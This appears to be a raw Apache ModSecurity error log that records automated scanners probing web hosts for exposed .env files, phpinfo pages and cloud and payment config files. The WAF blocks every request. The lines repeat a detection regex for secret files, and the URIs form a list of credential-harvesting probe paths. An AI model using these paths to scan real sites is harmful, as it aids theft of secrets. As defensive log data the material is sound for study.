[Tue May 26 14:29:53.455426 2026] [security2:error] [pid 606909:tid 607014] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/BACK/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVx_AAA_Gg"]
[Tue May 26 14:29:53.456184 2026] [security2:error] [pid 606909:tid 607002] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/BACKEND/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVx_QAA_Fw"]
[Tue May 26 14:29:53.462001 2026] [security2:error] [pid 606909:tid 606918] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/BE/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVx_gAAugg"]
[Tue May 26 14:29:53.483947 2026] [security2:error] [pid 606909:tid 607004] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/Be/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVyAAAAzF4"]
[Tue May 26 14:29:53.487027 2026] [security2:error] [pid 606909:tid 607016] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/Backend/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVyAQAAp2o"]
[Tue May 26 14:29:53.758758 2026] [security2:error] [pid 606909:tid 606929] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/_profiler/phpinfo.php"] [unique_id "ahVhCV0yRtX9qA7aVUVyIgAAmRM"]
[Tue May 26 14:29:53.855399 2026] [security2:error] [pid 606909:tid 607026] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/admin-app/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVyKgAAynQ"]
[Tue May 26 14:29:53.909576 2026] [security2:error] [pid 606909:tid 606949] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/admin/phpinfo.php"] [unique_id "ahVhCV0yRtX9qA7aVUVyNAAA0yc"]
[Tue May 26 14:29:53.964762 2026] [security2:error] [pid 606909:tid 606940] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/admin_phpinfo.php"] [unique_id "ahVhCV0yRtX9qA7aVUVyOAAAiB4"]
[Tue May 26 14:29:54.001774 2026] [security2:error] [pid 606909:tid 606938] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api-backend/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVyPAAAwRw"]
[Tue May 26 14:29:54.003972 2026] [security2:error] [pid 606909:tid 606937] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api-node/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVyPQAAwRs"]
[Tue May 26 14:29:54.031736 2026] [security2:error] [pid 606909:tid 606958] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVyPwAAwTA"]
[Tue May 26 14:29:54.154758 2026] [security2:error] [pid 606909:tid 607021] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api/info.php"] [unique_id "ahVhCl0yRtX9qA7aVUVySgAAwW8"]
[Tue May 26 14:29:54.207218 2026] [security2:error] [pid 606909:tid 607029] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/administrator/.env"] [unique_id "ahVhCV0yRtX9qA7aVUVyOQAAwXc"]
[Tue May 26 14:29:54.215549 2026] [security2:error] [pid 606909:tid 606968] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/api/phpinfo.php"] [unique_id "ahVhCl0yRtX9qA7aVUVyUQAA8jo"]
[Tue May 26 14:29:54.319852 2026] [security2:error] [pid 606909:tid 606946] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/apis/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVyXQAA4iQ"]
[Tue May 26 14:29:54.373984 2026] [security2:error] [pid 606909:tid 606984] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/app/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVyYwAA40o"]
[Tue May 26 14:29:54.463745 2026] [security2:error] [pid 606909:tid 607146] [client 176.65.139.232:41974] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "eco-green.com.mx"] [uri "/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVybwAAAPA"]
[Tue May 26 14:29:54.545799 2026] [security2:error] [pid 606909:tid 606991] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/application/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVyewAAolE"]
[Tue May 26 14:29:54.548705 2026] [security2:error] [pid 606909:tid 606993] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/apps/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVyfgAAi1M"]
[Tue May 26 14:29:54.864576 2026] [security2:error] [pid 606909:tid 607007] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/back-api/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVynwAA1WE"]
[Tue May 26 14:29:54.868237 2026] [security2:error] [pid 606909:tid 606924] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/back-end/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVyoQAA1Q4"]
[Tue May 26 14:29:54.868240 2026] [security2:error] [pid 606909:tid 606921] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/back/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVyogAA1Qs"]
[Tue May 26 14:29:54.868499 2026] [security2:error] [pid 606909:tid 606989] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backend-api/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVyowAA1U8"]
[Tue May 26 14:29:54.870429 2026] [security2:error] [pid 606909:tid 606922] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backend/.env"] [unique_id "ahVhCl0yRtX9qA7aVUVypAAA1Qw"]
[Tue May 26 14:29:54.899205 2026] [security2:error] [pid 610693:tid 610928] [client 57.141.2.31:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVhCjvNO3hpmlY6M8RtPwAAAGk"]
[Tue May 26 14:29:55.014608 2026] [security2:error] [pid 606909:tid 607019] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/backup/.env"] [unique_id "ahVhC10yRtX9qA7aVUVysgAA6G0"]
[Tue May 26 14:29:55.015101 2026] [security2:error] [pid 606909:tid 606999] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/be/.env"] [unique_id "ahVhC10yRtX9qA7aVUVyswAA6Fk"]
[Tue May 26 14:29:55.015376 2026] [security2:error] [pid 606909:tid 607020] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/beta/.env"] [unique_id "ahVhC10yRtX9qA7aVUVytAAA6G4"]
[Tue May 26 14:29:55.108049 2026] [security2:error] [pid 606909:tid 606941] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/client/.env"] [unique_id "ahVhC10yRtX9qA7aVUVyvQAAjh8"]
[Tue May 26 14:29:55.157924 2026] [security2:error] [pid 606909:tid 606961] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/cms/.env"] [unique_id "ahVhC10yRtX9qA7aVUVywAAAoDM"]
[Tue May 26 14:29:55.164396 2026] [security2:error] [pid 606909:tid 606937] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config.php"] [unique_id "ahVhC10yRtX9qA7aVUVyxgAAoBs"]
[Tue May 26 14:29:55.254059 2026] [security2:error] [pid 606909:tid 606964] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/.env"] [unique_id "ahVhC10yRtX9qA7aVUVyzAAAsDY"]
[Tue May 26 14:29:55.304381 2026] [security2:error] [pid 606909:tid 606996] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/aws.php"] [unique_id "ahVhC10yRtX9qA7aVUVy0wAA5VY"]
[Tue May 26 14:29:55.308391 2026] [security2:error] [pid 606909:tid 606969] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/config.inc.php"] [unique_id "ahVhC10yRtX9qA7aVUVy1wAAwTs"]
[Tue May 26 14:29:55.332264 2026] [security2:error] [pid 606909:tid 607034] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/config.php"] [unique_id "ahVhC10yRtX9qA7aVUVy2wAA83w"]
[Tue May 26 14:29:55.402484 2026] [security2:error] [pid 606909:tid 607037] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/env.php"] [unique_id "ahVhC10yRtX9qA7aVUVy4AAApX8"]
[Tue May 26 14:29:55.429131 2026] [security2:error] [pid 606909:tid 607035] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/module.config.php"] [unique_id "ahVhC10yRtX9qA7aVUVy5AAAwH0"]
[Tue May 26 14:29:55.449336 2026] [security2:error] [pid 606909:tid 606945] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/nexmo.php"] [unique_id "ahVhC10yRtX9qA7aVUVy5gAAzSM"]
[Tue May 26 14:29:55.457843 2026] [security2:error] [pid 606909:tid 606948] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/config/stripe.php"] [unique_id "ahVhC10yRtX9qA7aVUVy6wAAviY"]
[Tue May 26 14:29:55.644139 2026] [security2:error] [pid 606909:tid 606917] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/crm/.env"] [unique_id "ahVhC10yRtX9qA7aVUVzAQAAxgc"]
[Tue May 26 14:29:55.673319 2026] [security2:error] [pid 606909:tid 606992] [remote 195.178.110.199:50950] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.gestionbar.azurmediatec.com"] [uri "/cron/.env"] [unique_id "ahVhC10yRtX9qA7aVUVzAwAA91I"]
